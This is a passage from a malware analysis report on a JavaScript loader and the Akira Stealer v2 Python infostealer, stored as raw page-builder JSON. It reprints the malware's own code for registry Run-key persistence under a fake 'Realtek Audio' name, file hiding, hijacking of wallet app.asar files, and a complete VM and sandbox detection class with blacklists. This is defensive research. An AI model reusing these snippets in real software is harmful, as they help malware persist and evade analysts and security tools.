Strategy",[12,8262,8263,8264,8266],{},"After successful download, the script invokes the 
downloaded binary using ",[63,8265,5123],{},", ensuring that it runs in a new shell context:",[56,8268,8270],{"className":6987,"code":8269,"language":6989,"meta":65,"style":65},"exec(`start cmd /c start ${binderFile}`, ...);\n",[63,8271,8272],{"__ignoreMap":65},[102,8273,8274,8276,8278,8281,8284,8287,8289,8292],{"class":104,"line":105},[102,8275,7909],{"class":271},[102,8277,545],{"class":293},[102,8279,8280],{"class":289},"`start cmd /c start ${",[102,8282,8283],{"class":293},"binderFile",[102,8285,8286],{"class":289},"}`",[102,8288,805],{"class":293},[102,8290,8291],{"class":285},"...",[102,8293,825],{"class":293},[12,8295,8296],{},"To increase reliability, the script includes retry logic:",[56,8298,8300],{"className":6987,"code":8299,"language":6989,"meta":65,"style":65},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[63,8301,8302,8314,8325],{"__ignoreMap":65},[102,8303,8304,8307,8310,8312],{"class":104,"line":105},[102,8305,8306],{"class":271},"setTimeout",[102,8308,8309],{"class":293},"(() ",[102,8311,7782],{"class":285},[102,8313,7785],{"class":293},[102,8315,8316,8319,8321,8323],{"class":104,"line":111},[102,8317,8318],{"class":271},"  exec",[102,8320,545],{"class":293},[102,8322,8291],{"class":285},[102,8324,825],{"class":293},[102,8326,8327,8330,8333],{"class":104,"line":329},[102,8328,8329],{"class":293},"}, ",[102,8331,8332],{"class":275},"5000",[102,8334,825],{"class":293},[12,8336,8337],{},"This ensures that even if the initial execution fails (e.g., due to system load or race conditions), the malware will reattempt launching the binary after a short delay.",[12,8339,8340],{},[251,8341,8342],{},"Use Cases for the Binder",[12,8344,8345],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used to:",[1255,8347,8348,8351,8354,8357],{},[1258,8349,8350],{},"Reinstall or relaunch the primary malware components",[1258,8352,8353],{},"Display fake installers or 
decoy applications",[1258,8355,8356],{},"Deploy additional spyware, backdoors, or ransomware",[1258,8358,8359],{},"Modify system settings or disable security features",[41,8361,8363],{"id":8362},"_63-summary","6.3 Summary",[12,8365,47],{},[12,8367,8368,8370],{},[63,8369,6813],{}," is a highly obfuscated, encrypted JavaScript loader that uses industry-standard cryptography (PBKDF2 + AES-256-CBC) to protect its true purpose. Upon decryption, it operates as a fully capable second-stage loader that:",[1255,8372,8373,8378,8381,8386],{},[1258,8374,8375,8376,1289],{},"Retrieves further malware (",[63,8377,6874],{},[1258,8379,8380],{},"Modifies payload behavior dynamically",[1258,8382,8383,8384,1289],{},"Launches the actual stealer script (",[63,8385,4622],{},[1258,8387,8388,8389],{},"Reinforces persistence by restoring ",[63,8390,4614],{},[12,8392,8393,8394,8397],{},"Its combination of encryption, dynamic execution, modular payload fetching, and fileless operation showcases a ",[251,8395,8396],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[25,8399,8401,8402,1289],{"id":8400},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[63,8403,4622],{},[12,8405,31],{},[41,8407,8409],{"id":8408},"_71-high-level-functionality","7.1. High-Level Functionality",[12,8411,47],{},[12,8413,8414,8415,8417],{},"Akira Stealer v2 (",[63,8416,4622],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. 
It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[41,8419,8421],{"id":8420},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[12,8423,47],{},[186,8425,8427],{"id":8426},"_721-execution-chain-context","7.2.1 Execution Chain Context",[12,8429,192],{},[12,8431,8432,8434],{},[63,8433,4622],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[56,8436,8440],{"className":8437,"code":8438,"language":8439,"meta":65,"style":65},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[63,8441,8442,8447,8452,8457],{"__ignoreMap":65},[102,8443,8444],{"class":104,"line":105},[102,8445,8446],{},"Updater.exe\n",[102,8448,8449],{"class":104,"line":111},[102,8450,8451],{},"  └── main.exe (Electron app)\n",[102,8453,8454],{"class":104,"line":329},[102,8455,8456],{},"        └── cmd.exe\n",[102,8458,8459],{"class":104,"line":346},[102,8460,8461],{},"              └── python.exe astor.py\n",[12,8463,8464,8465,8467],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[63,8466,4614],{}," initiates the sequence and is responsible for maintaining persistence.",[186,8469,8471],{"id":8470},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[12,8473,192],{},[12,8475,8476,8477,8479],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. 
This ensures that ",[63,8478,4614],{}," is executed on each system startup:",[56,8481,8485],{"className":8482,"code":8483,"language":8484,"meta":65,"style":65},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[63,8486,8487,8492],{"__ignoreMap":65},[102,8488,8489],{"class":104,"line":105},[102,8490,8491],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[102,8493,8494],{"class":104,"line":111},[102,8495,8496],{},"os.system(command)\n",[1255,8498,8499,8506,8514],{},[1258,8500,8501,1062,8504],{},[251,8502,8503],{},"Path",[63,8505,5665],{},[1258,8507,8508,1062,8511,8513],{},[251,8509,8510],{},"Value name",[63,8512,5673],{}," (chosen to appear benign)",[1258,8515,8516,8519,8520],{},[251,8517,8518],{},"Payload path",": Typically in ",[63,8521,8522],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[12,8524,8525,8526,8529],{},"This command silently writes the autorun entry via PowerShell or native ",[63,8527,8528],{},"os.system()"," execution.",[186,8531,8533],{"id":8532},"_723-file-concealment","7.2.3 File Concealment",[12,8535,192],{},[12,8537,8538],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[56,8540,8542],{"className":8482,"code":8541,"language":8484,"meta":65,"style":65},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[63,8543,8544],{"__ignoreMap":65},[102,8545,8546],{"class":104,"line":105},[102,8547,8541],{},[1255,8549,8550,8556],{},[1258,8551,8552,8555],{},[63,8553,8554],{},"+h",": Marks the file as hidden",[1258,8557,8558,8561],{},[63,8559,8560],{},"+s",": Marks the file as a protected system file",[12,8563,8564],{},"This effectively removes the 
file from standard Windows Explorer views and increases stealth.",[186,8566,8568],{"id":8567},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[12,8570,192],{},[12,8572,8573,8574,8576,8577,805,8580,8583],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[63,8575,5068],{}," archive in Electron-based desktop wallets (e.g., ",[251,8578,8579],{},"Exodus",[251,8581,8582],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[12,8585,8586],{},"The logic looks for known wallet app paths:",[56,8588,8590],{"className":8482,"code":8589,"language":8484,"meta":65,"style":65},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[63,8591,8592],{"__ignoreMap":65},[102,8593,8594],{"class":104,"line":105},[102,8595,8589],{},[12,8597,8598,8599,1014],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[63,8600,4614],{},[41,8602,8604,8605,1289],{"id":8603},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[63,8606,8607],{},"VmProtect",[12,8609,47],{},[186,8611,8613],{"id":8612},"_731-introduction","7.3.1 Introduction",[12,8615,192],{},[12,8617,8618,8619,8621,8622,8624],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[4328,8620,4683],{}," implements a comprehensive VM/sandbox detection module (",[63,8623,8607],{},") that aggressively identifies and aborts execution under analyst-controlled environments. 
This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[186,8626,8628],{"id":8627},"_732-overview","7.3.2 Overview",[12,8630,192],{},[12,8632,6600,8633,8635],{},[63,8634,8607],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[1255,8637,8638,8644],{},[1258,8639,8640,8643],{},[251,8641,8642],{},"Level 1",": Lightweight, fast checks",[1258,8645,8646,8649],{},[251,8647,8648],{},"Level 2",": In-depth, comprehensive probes",[12,8651,8652,8653,8656,8657,8660,8661,8664],{},"If ",[63,8654,8655],{},"VmProtect.isVM(level)"," returns ",[63,8658,8659],{},"True",", the malware calls ",[63,8662,8663],{},"sys.exit()",", preventing further analysis.",[186,8666,8668],{"id":8667},"_733-detection-levels","7.3.3 Detection Levels",[12,8670,192],{},[417,8672,420,8674],{"style":8673},"width:100%; border-collapse: collapse;",[438,8675,8676,420,8685,420,8695,420,8705,420,8714,420,8724,420,8733,420,8742],{},[426,8677,424,8678,424,8681,424,8683,420],{},[430,8679,8680],{},"Feature",[430,8682,8642],{"style":3672},[430,8684,8648],{"style":3672},[426,8686,424,8687,424,8690,424,8693,420],{},[443,8688,8689],{},"HTTPSimulation",[443,8691,8692],{"style":3672},"✔️",[443,8694,8692],{"style":3672},[426,8696,424,8698,424,8701,424,8703,420],{"style":8697},"background-color: #f5f5f5;",[443,8699,8700],{},"Computer-name blacklist",[443,8702,8692],{"style":3672},[443,8704,8692],{"style":3672},[426,8706,424,8707,424,8710,424,8712,420],{},[443,8708,8709],{},"User-account blacklist",[443,8711,8692],{"style":3672},[443,8713,8692],{"style":3672},[426,8715,424,8716,424,8719,424,8722,420],{"style":8697},[443,8717,8718],{},"Hardware-UUID blacklist",[443,8720,8721],{"style":3672},"❌",[443,8723,8692],{"style":3672},[426,8725,424,8726,424,8729,424,8731,420],{},[443,8727,8728],{},"Public-hosting API 
check",[443,8730,8721],{"style":3672},[443,8732,8692],{"style":3672},[426,8734,424,8735,424,8738,424,8740,420],{"style":8697},[443,8736,8737],{},"Registry & GPU hints",[443,8739,8721],{"style":3672},[443,8741,8692],{"style":3672},[426,8743,424,8744,424,8747,424,8749,420],{},[443,8745,8746],{},"Task-killing background",[443,8748,8692],{"style":3672},[443,8750,8692],{"style":3672},[52,8752],{"className":8753},[4854,4855],[186,8755,8757,8758,8760],{"id":8756},"_734-vmprotect-architecture","7.3.4 ",[63,8759,8607],{}," Architecture",[12,8762,192],{},[12,8764,6600,8765,8767],{},[63,8766,8607],{}," class exposes the following primary methods:",[1255,8769,8770,8777,8784,8791,8798,8805,8812,8819],{},[1258,8771,8772],{},[251,8773,8774],{},[63,8775,8776],{},"checkUUID()",[1258,8778,8779],{},[251,8780,8781],{},[63,8782,8783],{},"checkComputerName()",[1258,8785,8786],{},[251,8787,8788],{},[63,8789,8790],{},"checkUsers()",[1258,8792,8793],{},[251,8794,8795],{},[63,8796,8797],{},"checkHosting()",[1258,8799,8800],{},[251,8801,8802],{},[63,8803,8804],{},"checkHTTPSimulation()",[1258,8806,8807],{},[251,8808,8809],{},[63,8810,8811],{},"checkRegistry()",[1258,8813,8814],{},[251,8815,8816],{},[63,8817,8818],{},"killTasks()",[1258,8820,8821],{},[251,8822,8823],{},[63,8824,8825],{},"isVM(level)",[12,8827,8828,8829,8832],{},"Each method returns a boolean or executes evasion steps. 
The ",[63,8830,8831],{},"isVM"," wrapper aggregates these checks based on the specified level.",[417,8834,420,8835],{"style":8673},[438,8836,8837,420,8849,420,8863,420,8877,420,8890,420,8903,420,8916,420,8929,420,8944],{},[426,8838,424,8839,424,8843,424,8846,420],{},[430,8840,8842],{"style":8841},"text-align: left;","Method",[430,8844,8845],{"style":8841},"Triggered By",[430,8847,8848],{"style":8841},"Description",[426,8850,424,8851,424,8855,424,8860,420],{},[443,8852,8853],{},[63,8854,8776],{},[443,8856,8857],{},[63,8858,8859],{},"isVM(2)",[443,8861,8862],{},"WMI UUID blacklist",[426,8864,424,8865,424,8869,424,8874,420],{"style":8697},[443,8866,8867],{},[63,8868,8783],{},[443,8870,8871],{},[63,8872,8873],{},"isVM(1,2)",[443,8875,8876],{},"Environment hostname match",[426,8878,424,8879,424,8883,424,8887,420],{},[443,8880,8881],{},[63,8882,8790],{},[443,8884,8885],{},[63,8886,8873],{},[443,8888,8889],{},"Username blacklist",[426,8891,424,8892,424,8896,424,8900,420],{"style":8697},[443,8893,8894],{},[63,8895,8797],{},[443,8897,8898],{},[63,8899,8859],{},[443,8901,8902],{},"IP hosting provider check via ip-api.com",[426,8904,424,8905,424,8909,424,8913,420],{},[443,8906,8907],{},[63,8908,8804],{},[443,8910,8911],{},[63,8912,8873],{},[443,8914,8915],{},"HTTPS interception detection",[426,8917,424,8918,424,8922,424,8926,420],{"style":8697},[443,8919,8920],{},[63,8921,8811],{},[443,8923,8924],{},[63,8925,8859],{},[443,8927,8928],{},"Registry & GPU driver artifacts",[426,8930,424,8931,424,8935,424,8941,420],{},[443,8932,8933],{},[63,8934,8818],{},[443,8936,8937,8940],{},[63,8938,8939],{},"isVM(...)"," spawn",[443,8942,8943],{},"Terminates known analysis processes",[426,8945,424,8946,424,8950,424,8953,420],{"style":8697},[443,8947,8948],{},[63,8949,8825],{},[443,8951,8952],{},"init",[443,8954,8955,8956,8958],{},"Aggregates checks and calls ",[63,8957,8818],{}," 
thread",[52,8960],{"className":8961},[4854,4855],[56,8963,8965],{"className":8482,"code":8964,"language":8484,"meta":65,"style":65},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[63,8966,8967,8972,8977,8982,8987,8992,8997,9002,9007,9012,9017,9023,9029,9035,9041,9047,9053,9059,9065,9071,9077,9083,9089,9095,9101],{"__ignoreMap":65},[102,8968,8969],{"class":104,"line":105},[102,8970,8971],{},"@staticmethod\n",[102,8973,8974],{"class":104,"line":111},[102,8975,8976],{},"def isVM(level: int) -> bool:\n",[102,8978,8979],{"class":104,"line":329},[102,8980,8981],{},"    # Always start background task-killer\n",[102,8983,8984],{"class":104,"line":346},[102,8985,8986],{},"    Thread(target=VmProtect.killTasks, daemon=True).start()\n",[102,8988,8989],{"class":104,"line":650},[102,8990,8991],{},"    if level == 1:\n",[102,8993,8994],{"class":104,"line":656},[102,8995,8996],{},"        # Fast path: HTTPS, hostname & user\n",[102,8998,8999],{"class":104,"line":662},[102,9000,9001],{},"        return (\n",[102,9003,9004],{"class":104,"line":668},[102,9005,9006],{},"            VmProtect.checkHTTPSimulation()\n",[102,9008,9009],{"class":104,"line":674},[102,9010,9011],{},"            or 
VmProtect.checkComputerName()\n",[102,9013,9014],{"class":104,"line":680},[102,9015,9016],{},"            or VmProtect.checkUsers()\n",[102,9018,9020],{"class":104,"line":9019},11,[102,9021,9022],{},"        )\n",[102,9024,9026],{"class":104,"line":9025},12,[102,9027,9028],{},"    if level == 2:\n",[102,9030,9032],{"class":104,"line":9031},13,[102,9033,9034],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[102,9036,9038],{"class":104,"line":9037},14,[102,9039,9040],{},"        try:\n",[102,9042,9044],{"class":104,"line":9043},15,[102,9045,9046],{},"            return (\n",[102,9048,9050],{"class":104,"line":9049},16,[102,9051,9052],{},"                VmProtect.checkHTTPSimulation()\n",[102,9054,9056],{"class":104,"line":9055},17,[102,9057,9058],{},"                or VmProtect.checkUUID()\n",[102,9060,9062],{"class":104,"line":9061},18,[102,9063,9064],{},"                or VmProtect.checkComputerName()\n",[102,9066,9068],{"class":104,"line":9067},19,[102,9069,9070],{},"                or VmProtect.checkUsers()\n",[102,9072,9074],{"class":104,"line":9073},20,[102,9075,9076],{},"                or VmProtect.checkHosting()\n",[102,9078,9080],{"class":104,"line":9079},21,[102,9081,9082],{},"                or VmProtect.checkRegistry()\n",[102,9084,9086],{"class":104,"line":9085},22,[102,9087,9088],{},"            )\n",[102,9090,9092],{"class":104,"line":9091},23,[102,9093,9094],{},"        except:\n",[102,9096,9098],{"class":104,"line":9097},24,[102,9099,9100],{},"            return False\n",[102,9102,9104],{"class":104,"line":9103},25,[102,9105,9106],{},"    return False\n",[186,9108,9110],{"id":9109},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware UUID",[12,9112,192],{},[12,9114,9115],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. 
One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[56,9117,9119],{"className":8482,"code":9118,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[63,9120,9121,9125,9130,9135,9140,9145,9150,9155,9160,9165],{"__ignoreMap":65},[102,9122,9123],{"class":104,"line":105},[102,9124,8971],{},[102,9126,9127],{"class":104,"line":111},[102,9128,9129],{},"def checkUUID() -> bool:\n",[102,9131,9132],{"class":104,"line":329},[102,9133,9134],{},"    try:\n",[102,9136,9137],{"class":104,"line":346},[102,9138,9139],{},"        raw = subprocess.run(\n",[102,9141,9142],{"class":104,"line":650},[102,9143,9144],{},"            \"wmic csproduct get uuid\", shell=True,\n",[102,9146,9147],{"class":104,"line":656},[102,9148,9149],{},"            capture_output=True\n",[102,9151,9152],{"class":104,"line":662},[102,9153,9154],{},"        ).stdout.splitlines()[2].decode().strip()\n",[102,9156,9157],{"class":104,"line":668},[102,9158,9159],{},"    except:\n",[102,9161,9162],{"class":104,"line":674},[102,9163,9164],{},"        raw = \"\"\n",[102,9166,9167],{"class":104,"line":680},[102,9168,9169],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[12,9171,9172],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to extract the UUID of the host machine. 
The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[186,9174,9176],{"id":9175},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[12,9178,192],{},[12,9180,9181,9182,9185],{},"The system hostname, accessed via the ",[63,9183,9184],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[56,9187,9189],{"className":8482,"code":9188,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... 
dozens more entries ...\n)\n",[63,9190,9191,9195,9200,9205,9210,9214,9219,9224,9229,9234],{"__ignoreMap":65},[102,9192,9193],{"class":104,"line":105},[102,9194,8971],{},[102,9196,9197],{"class":104,"line":111},[102,9198,9199],{},"def checkComputerName() -> bool:\n",[102,9201,9202],{"class":104,"line":329},[102,9203,9204],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[102,9206,9207],{"class":104,"line":346},[102,9208,9209],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,9211,9212],{"class":104,"line":650},[102,9213,7846],{"emptyLinePlaceholder":2180},[102,9215,9216],{"class":104,"line":656},[102,9217,9218],{},"BLACKLISTED_COMPUTERNAMES = (\n",[102,9220,9221],{"class":104,"line":662},[102,9222,9223],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[102,9225,9226],{"class":104,"line":668},[102,9227,9228],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[102,9230,9231],{"class":104,"line":674},[102,9232,9233],{},"    # ... dozens more entries ...\n",[102,9235,9236],{"class":104,"line":680},[102,9237,9238],{},")\n",[12,9240,9241],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[186,9243,9245],{"id":9244},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[12,9247,192],{},[12,9249,9250],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". 
These names are low-entropy and often hardcoded in open source sandbox environments.",[56,9252,9254],{"className":8482,"code":9253,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[63,9255,9256,9260,9265,9270,9275,9279,9284,9289,9294,9299],{"__ignoreMap":65},[102,9257,9258],{"class":104,"line":105},[102,9259,8971],{},[102,9261,9262],{"class":104,"line":111},[102,9263,9264],{},"def checkUsers() -> bool:\n",[102,9266,9267],{"class":104,"line":329},[102,9268,9269],{},"    user = os.getlogin().lower()\n",[102,9271,9272],{"class":104,"line":346},[102,9273,9274],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[102,9276,9277],{"class":104,"line":650},[102,9278,7846],{"emptyLinePlaceholder":2180},[102,9280,9281],{"class":104,"line":656},[102,9282,9283],{},"BLACKLISTED_USERS = (\n",[102,9285,9286],{"class":104,"line":662},[102,9287,9288],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[102,9290,9291],{"class":104,"line":668},[102,9292,9293],{},"    'a.monaldo','tvm',\n",[102,9295,9296],{"class":104,"line":674},[102,9297,9298],{},"    # ... 30+ more entries ...\n",[102,9300,9301],{"class":104,"line":680},[102,9302,9238],{},[12,9304,9305],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[186,9307,9309],{"id":9308},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[12,9311,192],{},[12,9313,9314,9315,9318],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. 
In this case, a simple HTTP request is made to ",[63,9316,9317],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[56,9320,9322],{"className":8482,"code":9321,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[63,9323,9324,9328,9333,9338,9342,9347,9352,9357,9362,9366],{"__ignoreMap":65},[102,9325,9326],{"class":104,"line":105},[102,9327,8971],{},[102,9329,9330],{"class":104,"line":111},[102,9331,9332],{},"def checkHosting() -> bool:\n",[102,9334,9335],{"class":104,"line":329},[102,9336,9337],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[102,9339,9340],{"class":104,"line":346},[102,9341,9134],{},[102,9343,9344],{"class":104,"line":650},[102,9345,9346],{},"        return http.request(\n",[102,9348,9349],{"class":104,"line":656},[102,9350,9351],{},"            'GET',\n",[102,9353,9354],{"class":104,"line":662},[102,9355,9356],{},"            'http://ip-api.com/line/?fields=hosting'\n",[102,9358,9359],{"class":104,"line":668},[102,9360,9361],{},"        ).data.decode().strip() == 'true'\n",[102,9363,9364],{"class":104,"line":674},[102,9365,9159],{},[102,9367,9368],{"class":104,"line":680},[102,9369,9370],{},"        return False\n",[12,9372,9373],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[186,9375,9377],{"id":9376},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[12,9379,192],{},[12,9381,9382,9383,9386],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign HTTPS request to a random subdomain under 
",[63,9384,9385],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed.",[56,9388,9390],{"className":8482,"code":9389,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return True\n",[63,9391,9392,9396,9401,9406,9410,9415,9419,9423],{"__ignoreMap":65},[102,9393,9394],{"class":104,"line":105},[102,9395,8971],{},[102,9397,9398],{"class":104,"line":111},[102,9399,9400],{},"def checkHTTPSimulation() -> bool:\n",[102,9402,9403],{"class":104,"line":329},[102,9404,9405],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[102,9407,9408],{"class":104,"line":346},[102,9409,9134],{},[102,9411,9412],{"class":104,"line":650},[102,9413,9414],{},"        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[102,9416,9417],{"class":104,"line":656},[102,9418,9159],{},[102,9420,9421],{"class":104,"line":662},[102,9422,9370],{},[102,9424,9425],{"class":104,"line":668},[102,9426,9427],{},"    return True\n",[12,9429,9430],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[186,9432,9434],{"id":9433},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[12,9436,192],{},[12,9438,9439,9440,9443],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. 
Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[63,9441,9442],{},"wmic"," for suspicious GPU strings.",[56,9445,9447],{"className":8482,"code":9446,"language":8484,"meta":65,"style":65},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[63,9448,9449,9453,9458,9463,9468,9473,9478,9483,9487,9491,9496,9501,9506,9511,9516,9521],{"__ignoreMap":65},[102,9450,9451],{"class":104,"line":105},[102,9452,8971],{},[102,9454,9455],{"class":104,"line":111},[102,9456,9457],{},"def checkRegistry() -> bool:\n",[102,9459,9460],{"class":104,"line":329},[102,9461,9462],{},"    r1 = subprocess.run(\n",[102,9464,9465],{"class":104,"line":346},[102,9466,9467],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[102,9469,9470],{"class":104,"line":650},[102,9471,9472],{},"        capture_output=True, shell=True)\n",[102,9474,9475],{"class":104,"line":656},[102,9476,9477],{},"    r2 = subprocess.run(\n",[102,9479,9480],{"class":104,"line":662},[102,9481,9482],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[102,9484,9485],{"class":104,"line":668},[102,9486,9472],{},[102,9488,9489],{"class":104,"line":674},[102,9490,7846],{"emptyLinePlaceholder":2180},[102,9492,9493],{"class":104,"line":680},[102,9494,9495],{},"    # GPU name 
check\n",[102,9497,9498],{"class":104,"line":9019},[102,9499,9500],{},"    gpu_out = subprocess.run(\n",[102,9502,9503],{"class":104,"line":9025},[102,9504,9505],{},"        \"wmic path win32_VideoController get name\",\n",[102,9507,9508],{"class":104,"line":9031},[102,9509,9510],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[102,9512,9513],{"class":104,"line":9037},[102,9514,9515],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[102,9517,9518],{"class":104,"line":9043},[102,9519,9520],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[102,9522,9523],{"class":104,"line":9049},[102,9524,9525],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[12,9527,9528],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[186,9530,9532],{"id":9531},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real 